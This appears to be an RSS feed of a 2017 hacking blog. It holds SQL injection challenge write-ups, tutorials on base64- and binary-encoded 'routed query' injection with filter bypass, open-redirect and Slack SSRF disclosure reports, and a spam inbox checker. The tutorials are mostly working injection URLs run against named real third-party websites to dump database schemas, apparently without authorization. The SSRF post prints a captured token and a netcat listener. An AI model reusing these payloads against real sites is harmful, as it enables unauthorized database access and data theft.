SQLi Basic http://rootedup.com Black_EyE Blog Wed, 30 Aug 2017 06:41:37 +0000 en-US hourly 1 https://wordpress.org/?v=4.8.2 Valid Email Inbox Checker http://rootedup.com/2017/08/12/valid-email-inbox-checker/ http://rootedup.com/2017/08/12/valid-email-inbox-checker/#respond Sat, 12 Aug 2017 12:06:00 +0000 Valid Email Inbox Checker

Hi Guyz,
Take my Salam, Here is Shaifullah Shaon (Black_EyE), an Ethical hacker from Bangladesh.

Here have script which name “Valid Email Inbox Checker”.

Who checked your server enable email to send your inbox or spam.
Let’s Go…

1. Upload script on a server.
2. Open the script.
3. Input email using “,” symbol or line break.
like:
shaon.durjoy@gmail.com, shaon.durjoy@hotmail.com
or
shaon.durjoy@gmail.com
shaon.durjoy@hotmail.com
4. Check now Inbox email go or not.
If Email send to inbox, then this server enable to send spam email to inbox. Else, server send email into spam box.
5. So now here, Email going to inbox, that means, Here Server is enable to sending email into inbox.

N.B: Here Script can check email address is valid or not, like if having some symbol in the while email address, like:
asdf@lol!.com
Then this script said that,  OOOPSS!!! SOMETHING IS WRONG.

DOn’t use this script in bad way. Enjoy and use this script.

Valid Email Checker: Download From Here

Regards,
Shaifullah Shaon (Black_EyE)

]]>
http://rootedup.com/2017/08/12/valid-email-inbox-checker/feed/ 0
KashmiriWOlf Challenge 2 Solution http://rootedup.com/2017/08/11/kashmiriwolf-challenge-2-solution/ http://rootedup.com/2017/08/11/kashmiriwolf-challenge-2-solution/#respond Fri, 11 Aug 2017 10:01:00 +0000

Kashmiri_WOlf Challenge 2 Solution

Salam Guys … I Was Getting Too Many Requests On Closing My Challenges (About Advance Sqli) .. Some Guys Said “Don’t Share Your Knowledge Like This … It Will Be lammed” .. But I Am One Of The Greatest Lammer Ever … And Master Ajakro Is My Inspiration …
He Used To Share His Knowledge And People Used To Learn From It (At least 0.00001% did including me)

So I Thought “Sharing Wont Decrease My Knowledge” SO I Am Gonna Post Solutions On Some Of My Challenges

Lets Start From Challenge No 2 

Here Is Link Of This Challenge

http://forum.sqliwiki.com/showthread.php?tid=4832

I Will Use Master Ajkaro’s Style To Explain Things

There Are 4 Tasks :
A.Print Name wd version
B.User(must be like pic) and Db
C.Print Tables starting wd ‘u’ and not containing any ‘a’ word in Them From Primary Database(Also Tell How Many Such Tables Exist)

D.Print Records And Data In Tables and sort them in descending order if more than 1 (according to records)

Rules Are :

For First Task Dont use any char,hex,binary,base64(),ascii,quotes,[@@version,version(),@@GLOBAL.VERSION,@@VERSION_COMMENT](For Printing Version]
General Rules Dont Use Lpad,rpad,group_concat,NO Underscored(_) Concatenating Functions,No Variables,replace(not more than 1),You may not use any nested function for dios,repeat,insert,lpad,rpad,find_in_set,aes_decrypt/encrypt,len()
You cant use COncat More Than 3 times
Use Dios
Your Solution Should Be GEnerci(should work on every site without including waffed sites where such tables exist)
YOur Injection Should Work Without KNowing Anything About Databases/tables

First We Will Just Complete The Tasks :
Lets Start
We Have To Concatenate 4(A,B,C,D) tasks :
Our Query Will Be Like : Concat(A,B,C,D)
Lets Looks At Them Seperately

Part A
:
Print Name wd version I will use localhost here

Code :

Concat 
(
'Kashmiri :: ',version()

)

And Here IT is :

localhost/sqli/?id=1 union select 1,concat('Kashmiri :: ',version()),3,4,5


Ok Now Check Rules
For First Task

1.For First Task Dont use any char,hex,binary,base64(),ascii,quotes ~~> For Printing Your Name

That Means For Printing Name We Cant Use Above Mentioned Things …

But Keep It In My Mind There Is Another Rule “Your Solution Should Be GEnerci(should work on every site without including waffed sites+where such tables exist)”
That Means Your Code Should Work For Other Sites Too … We Will Be Using Here A Mathematical Function :
Conv(Number,from_base,to_base)

Reference(https://dev.mysql.com/) Converts numbers between different number bases. Returns a string representation of the number N, converted from base from_base to base to_base. Returns NULL if any argument is NULL. The argument N is interpreted as an integer, but may be specified as an integer or a string. The minimum base is 2 and the maximum base is 36. If from_base is a negative number, N is regarded as a signed number. Otherwise, N is treated as unsigned. CONV() works with 64-bit precision.

Code :

Concat 
(
conv(N,10,32),conv(N,10,32) .. so on
)

So Our query will be like :

]localhost/sqli/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32))),3,4,5


Proof ~~>

http://imgur.com/a/HG13S


2.[@@version,version(),@@GLOBAL.VERSION,@@VERSION_COMMENT] ~~> For Printing Version
 

We Know There Are Two Tables In Mysql :
global_variables
session_variables

and one is very rare :
system_variables

We All know first has usually two columns :
variable_name
variable_value

If We Dump these columns from these tables … It Contains much necessary Info … It ALso contains Version … so we will print version from this table

Code :

(select 
concat
(variable_name,' :: ',variable_value)
from information_schema.global_variables
where variable_name sounds
like '%version%'
)

Or

(select 
concat
(variable_name,' :: ',variable_value)
from information_schema.session_variables
where variable_name sounds
like '%version%'
)

Lets Concatenate These Two Parts 1 and 2 concat(1,2)

Code :

localhost/sqli/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32)),'
',(select
concat
(variable_name,' :: ',variable_value)
from information_schema.global_variables
where variable_name sounds
like '%version%'
)),3,4,5

Proof ~~>

http://imgur.com/a/dI4cO

Used lower() here to print letters in lowercase

lower(string)

Part A Is Completed With All Rules Followed

Part B

User(Must be like my poc) and Db
User Is Usually root@localhost
Here task was to print asterik(*) instead of @

Lets Print User as In PoC :

We Will use Replace() function here

Replace(string,string _from_string_to_be_replaced,string_to_be_replaced_with)

Example :

Code :

repalce
(
0x24,0x24,'Kashmiri'
)

For User :

Code:

replace
(
user(),'@','*'
)

Final Code Will BE :

localhost/sqli/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32)),'
',(select concat (variable_name,' :: ',variable_value) from information_schema.global_variables where variable_name like '%version%' limit 1,1),'
',replace
(
user(),'@','*'
),'
',database()),3,4,5

Proof ~~>

http://imgur.com/a/V6WQ4

Part B is completed
Lets Move to part C

Part C
:
Print Tables starting wd ‘u’ and not containing any ‘a’ word in Them From Primary Database(Also Tell How Many Such Tables Exist)

we will use searching here (Used Ajkaro’s Sentence ^_^)

How Many Such Tables Exist WE will use count() first

Code :

(select 
count(*) from information_schema.tables where table_schema=database() and table_name like 'u%' and table_name not like '%a%'
)

Now Printing Them (For THis We Will Use Dios)

Code :

(Select(@x)from(select(@x:=0x00),(select(@x)from(information_schema.tables)where(table_schema=database())and(table_name like 'u%')and table_name not like '%a%' and@x:=concat(@x,table_name)))x)

Our Final Query WIll Be :

Code :


http://localhost/sqli-labs-master/Less-1/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32)),'
',(select concat (variable_name,' :: ',variable_value) from information_schema.global_variables where variable_name sounds like '%version%' ),'
',replace (user(),'@','*'),'
',database(),'
',(select count(*) from information_schema.tables where table_schema=database() and table_name like 'u%' and table_name not like '%a%' ),(Select(@x)from(select(@x:=0x00),(select(@x)from(information_schema.tables)where(table_schema=database())and(table_name like 'u%')and table_name not like '%a%' and@x:=concat(@x,'
',table_name)))x)),3-- -

Proof ~~>

http://imgur.com/a/1Dnan

Part C is completed

Part D :

D.Print Records And Data In Tables and sort them in descending order if more than 1 (according to records)
This Is Easy AS HEll :

Final Query :

http://localhost/sqli-labs-master/Less-1/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32)),'
',(select concat (variable_name,' :: ',variable_value) from information_schema.global_variables where variable_name sounds like '%version%' ),'
',replace (user(),'@','*'),'
',database(),'
',(select count(*) from information_schema.tables where table_schema=database() and table_name like 'u%' and table_name not like '%a%' ),(Select(@x)from(select(@x:=0x00),(select(@x)from(information_schema.tables)where(table_schema=database())and(table_name like 'u%')and table_name not like '%a%' and@x:=concat(@x,'
',table_name,' :: ',table_rows,' :: ',data_length)))x)),3-- -

Proof ~~>

http://imgur.com/a/c3tFv

I Will Explain sorting IN Next Session Here We Had Only One table .. so i didnt sort them

Credits To ~~ > Master ajkaro,benzi,makman,khexan,rummy,cybrhckr

Regards

KASHMIRI_WOLF

Fb Link : Kashmiri_Wolf Thanks To Sqli-Basic For Letting Me Share This

]]>
http://rootedup.com/2017/08/11/kashmiriwolf-challenge-2-solution/feed/ 0
Base64 Based Routed Query By Kashmiri_Wolf http://rootedup.com/2017/08/10/base64-based-routed-query-by-kashmiri_wolf/ http://rootedup.com/2017/08/10/base64-based-routed-query-by-kashmiri_wolf/#respond Thu, 10 Aug 2017 09:47:00 +0000 Tutorial On Base64 Based Routed Query By Kashmiri_Wolf

Assalam-O-Alaikum Guys !
This is Kashmiri_Wolf .. Today I Am Gonna Write About Base64 Based Routed Query
We Will Use A New Function Here (New For Newbies Like Me)
Which IS “from_base64()”

SO Lets Get Straight :
Here IS Site :

http://www.egytravelcorner.com/ar/articals-more.php?id=1

Its A Basic Injection Till Dios So Here Is Query For Vuln Column :

http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(1),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384

Here Routed Query Is A Way To Dios It (For Pure Union base and $_get method)

Hex I Allowed Here .. But We Will Use Base64 Routed Query Here … Lets Start …
   

http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(from_base64('KDEnKQ==')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384 

Here is The Error For Routed Query Lets Fix Query And Get Total Numbers Of Columns (Column Count)
   

http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(from_base64('KDEnLS0gLSk=')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384

Query Balanced Lets Check For Order by

http://www.egytravelcorner.com/ar/articals-more.php?id=1'/**shit**//*!00000Union*/(Select(from_base64('KDEnIG9yZGVyIGJ5IDktLSAtKQ==')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))-- -&mi_id=384

No Error

http://www.egytravelcorner.com/ar/articals-more.php?id=1'/**shit**//*!00000Union*/(Select(from_base64('KDEnIG9yZGVyIGJ5IDEwLS0gLSk=')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))-- -&mi_id=384

9 columns lets check for vuln Column

http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(from_base64('KC4xJyAgVW5pb24gU2VsZWN0IDEsMiwzLDQsNSw2LDcsOCw5OS0tIC0p')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384

Vuln Column Is Under Image

Lets Dios :

http://www.egytravelcorner.com/ar/articals-more.php?id=1'/**shit**//*!00000Union*/(Select(FROM_BASE64('KDEnLyoqXyoqLy8qITUwMDAwVW5pb24qL1NlbGVjdCAxMTEsMjIyLDMzMzMsY29uY2F0LyoqXyoqLygweDIyMmYzZTNjNjI3MjNlM2MyZjY0Njk3NjNlM2MyZjc0NjE2MjZjNjUzZTNjMmY3MDNlM2M2NjZmNmU3NDIwNjM2ZjZjNmY3MjNkNzI2NTY0MjA2NjYxNjM2NTNkNjM2MTZkNjI3MjY5NjEyMDczNjk3YTY1M2QzMzNlLG1ha2Vfc2V0KDYsQDo9MHgwYSwoc2VsZWN0KDEpZnJvbShpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyl3aGVyZUA6PW1ha2Vfc2V0KDUxMSxALDB4M2M2YzY5M2UsdGFibGVfbmFtZSxjb2x1bW5fbmFtZSkpLEApKSw1NjYsNjY2LDc3Nyw4ODgsOTk5LS0gLSk=')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))-- -&mi_id=384

SO Here IS Our Final Query !

Keeping Concept In Mind You Can Also Do Same With Char I guess (Not Tested Yet !!)

Credits To ~~> Master Benzi,Khexan Ro0t,Master Janus,Makman,Ajkaro,Rahul Maini,Raz

Sorry For Bad Explanation …….. If Any Problem You Can Pm Me Here Kashmiri_Wolf

Thanks To Sqli-Basic For Letting Me Share This 🙂

Regards :
Kashmiri_Wolf

]]>
http://rootedup.com/2017/08/10/base64-based-routed-query-by-kashmiri_wolf/feed/ 0
Unvalidated Redirects/ Open Redirect Vulnerability on Hackster Registrat… http://rootedup.com/2017/08/10/unvalidated-redirects-open-redirect-vulnerability-on-hackster-registrat/ http://rootedup.com/2017/08/10/unvalidated-redirects-open-redirect-vulnerability-on-hackster-registrat/#respond Thu, 10 Aug 2017 05:58:00 +0000 Hi Hackster,

Here is Shaifullah Shaon (Black_EyE), An Ethical Hacker.
a white hat cyber security researcher from Bangladesh reporting a serious
[3’rd ranking in OWASP] security vulnerability on your system.

I faced a technical security bug called “Unvalidated_Redirects/ Open Redirect Vulnerability on Hackster Registration Url and Login Url”.

Description of Vuln:
Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the
web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input
to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server
name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance.
Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s
access control check and then forward the attacker to privileged functions that they would normally not be able to access.

Reference:

Unvalidated_Redirects/ Open Redirect Vulnerability:
https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
http://www-01.ibm.com/support/docview.wss?uid=swg21986393

Vuln Link:  https://www.hackster.io/users/sign_in?redirect_to=/feed&source=welcome-home
   https://www.hackster.io/users/sign_up?redirect_to=/feed&source=welcome-home

POC url:  https://www.hackster.io/users/sign_in?redirect_to=hTTpS:///google.com
   https://www.hackster.io/users/sign_up?redirect_to=hTTpS:///google.com

Let’s follow me,
1. Open Vuln Link in browser.
2. Change redirect_to= to any site. Now I try to hTTps:///google.com
3. Just press go button or hit into ENTER
4. And as you see I can redirect to any site.

Let’s Check again with facebook.com
As you see, here redirect to anysite using this method. and it’s also goes to parmanently redriact.

Please See my Video Poc for understand clearly. Hopefully Those are Very critical issue.
Resolve those issue as soon as possible. Please see this video carefully for understanding.

Here is proof as video concept (unlisted): https://youtu.be/z8R4HDHvkoI

Thank you
Shaifullah Shaon (Black_EyE)
shaon.durjoy@gmail.com

It’s an Online It Section
Please Subscribe us.

]]>
http://rootedup.com/2017/08/10/unvalidated-redirects-open-redirect-vulnerability-on-hackster-registrat/feed/ 0
[Tutorial]Binary Based Routed Query[Kashmiri_Wolf] http://rootedup.com/2017/08/09/tutorialbinary-based-routed-querykashmiri_wolf/ http://rootedup.com/2017/08/09/tutorialbinary-based-routed-querykashmiri_wolf/#respond Wed, 09 Aug 2017 15:32:00 +0000 [Tutorial]Binary Based Routed Query[Kashmiri_Wolf]

Hi Brothers I Am Here With Some Interesting Stuff !

Whole Credit Goes TO Kashmir_Hunter
Today I Will Show You How To Inject Site When Most Of Functions Are Almost Blocked And Your Luck Is Good That Day !!
You Can Get Basic Concept Of Routed Query From here
http://securityidiots.com/Web-Pentest/SQL-Injection/routed_sql_injection.html ~~> Thanks To Master Zen

Site(Used For Tutorial):

http://www.caresoft.ind.in/info.php?show=185

The Injecting Process : (upto vuln column)

http://pastebin.com/dJMA9uhd

Ok This Wasnt A Big Deal But Now The Real Task Comes Here And That Is Dios
It Was Not Too Easy So Lets Search For Routed Query Because Usually When We Face 403 forbidden error And With BOF Its Not Easy Or You Can Say Impossible To Bypass Information_schema So Hexed Routed Query Is Best Option If You Are Lucky You Can Find It In Target Site But Problem here is hex allows only one character

See How :

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0x27,2,3,4,5,6,7-- -

(Error Mean Routed Query Exists)

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0x3127,2,3,4,5,6,7-- -

(403 forbidden) and we cant bypass it here so lets think If We Can print our name with hex and it also works for routed query so we can also do it with binary/char/base64 i will show u binary based and base64 based routed queries here

now lets see how

First DO Same Like Hexed routed query

00110001 00100111 (remove spaces)
put this in one column(1st)adding 0b at start to execute binary

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0b0011000100100111 ,2,3,4,5,6,7-- -

(got Error)

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0b001100010010011100101101001011010010000000101101,2,3,4,5,6,7-- -

Query Balanced Now Lets Check For Order By

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0b001100010010011100100000011011110111001001100100011001010111001000100000011000100111100100100000001100010011000000101101001011010010000000101101,2,3,4,5,6,7-- - 

(mean order by 10 –> error)

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0b0011000100100111001000000110111101110010011001000110010101110010001000000110001001111001001000000011011100101101001011010010000000101101,2,3,4,5,6,7-- -

(order by 7~~> no error)

Lets Find Vuln Columns

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0b001100010010011100100000011101010110111001101001011011110110111000100000011100110110010101101100011001010110001101110100001000000011000100101100001100100010110000110011001011000011010000101100001101010010110000110110001011000011011100101101001011010010000000101101,2,3,4,5,6,7-- -

Here We Got Vulnerable Column And That Is 3 Under Image

Now Lets Dios The Site

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0b0011000100100111001000000111010101101110011010010110111101101110001000000111001101100101011011000110010101100011011101000010000000110001001011000011001000101100011000110110111101101110011000110110000101110100001010000011000001111000001100100011001000110010011001100011001101100101001100100011001000110011011001010011001001100110001100110110010100110011011000110011011000110110001101100110011000110110011001010011011100110100001100100011000000110110001100110011011001100110001101100110001100110110011001100011011100110010001100100011000000110011011001000011011100110010001101100011010100110110001101000011001101100101001101000110001000110110001110010011011001100011001101100110001100110110001101010011011100110010001011000110110101100001011010110110010101011111011100110110010101110100001010000011011000101100010000000011101000111101001100000111100000110000011000010010110000101000011100110110010101101100011001010110001101110100001010000011000100101001011001100111001001101111011011010010100001101001011011100110011001101111011100100110110101100001011101000110100101101111011011100101111101110011011000110110100001100101011011010110000100101110011000110110111101101100011101010110110101101110011100110010100101110111011010000110010101110010011001010100000000111010001111010110110101100001011010110110010101011111011100110110010101110100001010000011010100110001001100010010110001000000001011000011000001111000001100110110001100110110011000110011011000111001001100110110010100101100011101000110000101100010011011000110010101011111011011100110000101101101011001010010110001100011011011110110110001110101011011010110111001011111011011100110000101101101011001010010100100101001001011000100000000101001001011000011000001111000001100110110001100110010011001100011011000110110001101100110011000110110011001010011011100110100001100110110010100101001001011000011010000101100001101010010110000110110001011000011011100101101001011010010000000101101,2,3,4,5,6,7-- -

This Is Our Final Query !!!

Credits To ~~> Master Benzi,Khexan Ro0t,Master Janus,Makman,Ajkaro,Rahul Maini,Raz

Sorry For Bad Explanation …….. If Any Problem You Can Pm Me Here   Kashmiri_Wolf [FB]

Binary Based Routed Query Will Be Posted In Next Part … Stay Tuned For That …
Thanks To Sqli-Basic For Letting Me Share THis

]]>
http://rootedup.com/2017/08/09/tutorialbinary-based-routed-querykashmiri_wolf/feed/ 0
SSRF (Server Site Request Forgery)on slack.com http://rootedup.com/2017/08/09/ssrf-server-site-request-forgeryon-slack-com/ http://rootedup.com/2017/08/09/ssrf-server-site-request-forgeryon-slack-com/#respond Wed, 09 Aug 2017 10:26:00 +0000 Hi Slack Security Team,

Here is Shaifullah Shaon (Black_EyE), An Ethical Hacker.
a white hat cyber security researcher from Bangladesh reporting a serious
[3’rd ranking in OWASP] security vulnerability on your system.

I faced a technical security bug called “SSRF (Server Site Request Forgery)on slack.com”.

Now I exploited it. If you verify more, so you can see my video poc that was unlisted my youtube channel.

Let’s follow me,

1. I already Open my Account.
2. I was create an app which I installed into my cheat box.
3. Now I use /comamnd which I was set a url http://scanme.nmap.org:22
4. Now I put /comma (Slash command) on message box.
   SSRF Testing APP 10:39 AM
   Only visible to you
   SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8
   As you see, Here showing The Open SSH Version.
5. Now I am change website url from http://scanme.nmap.org:22 to 31.208.61.136 (This is my Own ssh) and use my 55 Port.
6. Now again put /comma (Slash command) on message box.
7. As you see here, Slack message box showing me 503 (Timeout was reached). But Here see my ssh. I was forwarded my 55 no port using netcat.
    nc -lnvvp 55
    listening on [::]:55 …
   here was port listing, Now when see the 503 (Timeout was reached) from message box, Here I get user token from your server.
   token=KYfpmy2m8mSBrElI1lB8SR8a&team_id=T699WGVQS&team_domain=testdevopsdaveteam&channel_id=D6AKZDF6W&channel_name=directmessage&
   user_id=U6APVADK7&user_name=testingfuck&command=%2Fcomma&text=&
   response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2FT699WGVQS%2F215699702339%2F1OUns1YkN1jhXulMpjHVgG5x

POST / HTTP/1.1
User-Agent: Slackbot 1.0 (+https://api.slack.com/robots)
Accept-Encoding: gzip,deflate
Accept: application/json,*/*
Content-Length: 298
Content-Type: application/x-www-form-urlencoded
Host: 31.208.61.136:55
Cache-Control: max-age=259200
Connection: keep-alive

token=KYfpmy2m8mSBrElI1lB8SR8a&team_id=T699WGVQS&team_domain=testdevopsdaveteam&channel_id=D6AKZDF6W&channel_name=directmessage&user_id=U6APVADK7&user_name=testingfuck&command=%2Fcomma&text=&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2FT699WGVQS%2F215699702339%2F1OUns1YkN1jhXulMpjHVgG5x
  
  
** Note: An attacker can stole user token using this issue.

Please See my Video Poc for understand clearly. Hopefully Those are Very critical issue.
Resolve those issue as soon as possible.

Here is proof as video concept (unlisted): https://youtu.be/REV3IG5qGFc

Thank you
Shaifullah Shaon (Black_EyE)
shaon.durjoy@gmail.com

It’s an Online It Section
Please Subscribe us.

]]>
http://rootedup.com/2017/08/09/ssrf-server-site-request-forgeryon-slack-com/feed/ 0
Sqli Challenge Solution http://rootedup.com/2017/08/07/sqli-challenge-solution/ http://rootedup.com/2017/08/07/sqli-challenge-solution/#respond Mon, 07 Aug 2017 07:56:00 +0000 Sqli Challenge Solution

]]>
http://rootedup.com/2017/08/07/sqli-challenge-solution/feed/ 0
Sqli CHallenge Solution(Easy) By Kashmiri_wolf http://rootedup.com/2017/08/07/sqli-challenge-solutioneasy-by-kashmiri_wolf/ http://rootedup.com/2017/08/07/sqli-challenge-solutioneasy-by-kashmiri_wolf/#respond Mon, 07 Aug 2017 07:52:00 +0000  Sqli CHallenge Solution(Easy) By Kashmiri_wolf



]]>
http://rootedup.com/2017/08/07/sqli-challenge-solutioneasy-by-kashmiri_wolf/feed/ 0
Bouabid Challenge Solution by Kashmiri_wolf http://rootedup.com/2017/08/07/bouabid-challenge-solution-by-kashmiri_wolf/ http://rootedup.com/2017/08/07/bouabid-challenge-solution-by-kashmiri_wolf/#respond Mon, 07 Aug 2017 07:47:00 +0000

Bouabid Challenge Solution by Kashmiri_wolf

]]>
http://rootedup.com/2017/08/07/bouabid-challenge-solution-by-kashmiri_wolf/feed/ 0
Callenge Solution Of Ahmed Chaanda By Kashmiri_wolf http://rootedup.com/2017/08/07/callenge-solution-of-ahmed-chaanda-by-kashmiri_wolf/ http://rootedup.com/2017/08/07/callenge-solution-of-ahmed-chaanda-by-kashmiri_wolf/#respond Mon, 07 Aug 2017 07:40:00 +0000 Callenge Solution Of Ahmed Chaanda By Kashmiri_wolf

]]>
http://rootedup.com/2017/08/07/callenge-solution-of-ahmed-chaanda-by-kashmiri_wolf/feed/ 0